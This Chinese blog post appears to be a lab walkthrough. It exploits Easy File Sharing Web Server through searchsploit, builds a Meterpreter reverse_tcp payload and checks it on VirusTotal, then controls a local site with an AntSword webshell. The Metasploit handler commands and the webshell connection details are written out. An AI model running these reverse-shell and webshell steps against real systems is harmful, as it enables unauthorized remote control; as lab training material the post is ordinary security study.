news 2026/9/26 22:37:38

远程控制复现

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
远程控制复现

一、漏洞测试
打开easy file sharing web server

进入后修改端口

点击go可以看到

之后打开kali用searchsploit easy file sharing扫描漏洞

利用对应的Python脚本攻击

攻击完成,说明无法阻挡本身漏洞
二、kali生成被控端和启动主控端
先ifconfig查询kali的ip地址然后生成payload

www.virustotal.com的检测结果

然后启动主控端


然后依次输入1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
3.set lhost 目标ip
4.set lport 5000
5.exploit

然后靶机打开payload.exe即可
三、蚁剑控制目标网站
打开phpstudy,启动apache和MySQL

然后生成shell.php

最后打开蚁剑,url地址填http://ip地址(一般为127.0.0.1)/shell.php,连接密码cmd即可

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!